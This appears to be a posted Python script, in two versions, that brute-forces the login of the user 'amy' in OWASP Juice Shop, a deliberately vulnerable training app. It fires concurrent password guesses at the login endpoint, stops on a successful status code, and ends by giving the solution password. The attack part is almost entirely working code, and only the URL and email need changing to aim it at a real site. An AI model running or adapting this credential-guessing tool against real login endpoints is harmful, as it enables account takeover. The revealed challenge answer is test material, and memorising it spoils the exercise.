This python file helps you to solve the "Login Amy" challenge of OWASP Juice Shop (https://github.com/bkimminich/juice-shop)

Owasp_juice_shop_login_amy.py

__author__ = "@Pascalsec"
import requests
import aiohttp
import asyncio

your_juice_shop_url = "https://<YOUR OWASP JUICE SHOP URL>{}".format("/rest/user/login")

def build_queue():

    queue = []

    uppercase_letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    lowercase_letters = "abcdefghijklmniopqrstuvxyz"
    numbers = "0123456789"

    for up_letter in uppercase_letters: 
        for low_letter in lowercase_letters:
            for number in numbers:
                queue.append(f"{up_letter}{number}{low_letter}.....................")                
    return queue

async def login_amy(name, async_queue):

    async with aiohttp.ClientSession() as session:
        while not async_queue.empty():
            password = await async_queue.get()
            print(f"Task {name}:\t Trying password: {password}")
            async with session.post(your_juice_shop_url, json={'email': '[email protected]', 'password': password}) as response:
                await response.text()

async def main(password_queue):

    async_queue = asyncio.Queue()

    for password in password_queue:
        await async_queue.put(password)

    await asyncio.gather(
            asyncio.create_task(login_amy("One", async_queue)),
            asyncio.create_task(login_amy("Two", async_queue)),
            asyncio.create_task(login_amy("Three", async_queue)),
            asyncio.create_task(login_amy("Four", async_queue)),
            asyncio.create_task(login_amy("Five", async_queue)),
        )

    return False

if __name__ == "__main__": 
    password_queue = build_queue()
    asyncio.run(main(password_queue))

__author__ = "@Pascalsec"
import requests
import aiohttp
import asyncio
import time

your_juice_shop_url = "https://juice-shop.herokuapp.com{}".format("/rest/user/login")

passfound = False

def build_queue():

    queue = []

    uppercase_letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    lowercase_letters = "abcdefghijklmniopqrstuvxyz"
    numbers = "0123456789"

    for up_letter in uppercase_letters: 
        for low_letter in lowercase_letters:
            for number in numbers:
                queue.append(f"{up_letter}{number}{low_letter}.....................")                
    return queue

async def login_amy(async_queue):
    global passfound
    async with aiohttp.ClientSession() as session:
        while not async_queue.empty() and not passfound:
            password = await async_queue.get()
            print(f"Trying password: {password}")
            async with session.post(your_juice_shop_url, json={'email': '[email protected]', 'password': password}) as response:
                # await response.text()
                status = response.status
                if status >= 200 and status < 300:
                  passfound = True
                  print(f"password found: {password}")

async def main(password_queue):

    async_queue = asyncio.Queue()

    for password in password_queue:
        await async_queue.put(password)

    task = [asyncio.create_task(login_amy(async_queue)) for x in range(10)]
    await asyncio.gather(*task)

    return False

if __name__ == "__main__": 
    password_queue = build_queue()
    asyncio.run(main(password_queue))

This code will stop once the password is found.

Password: K1f.....................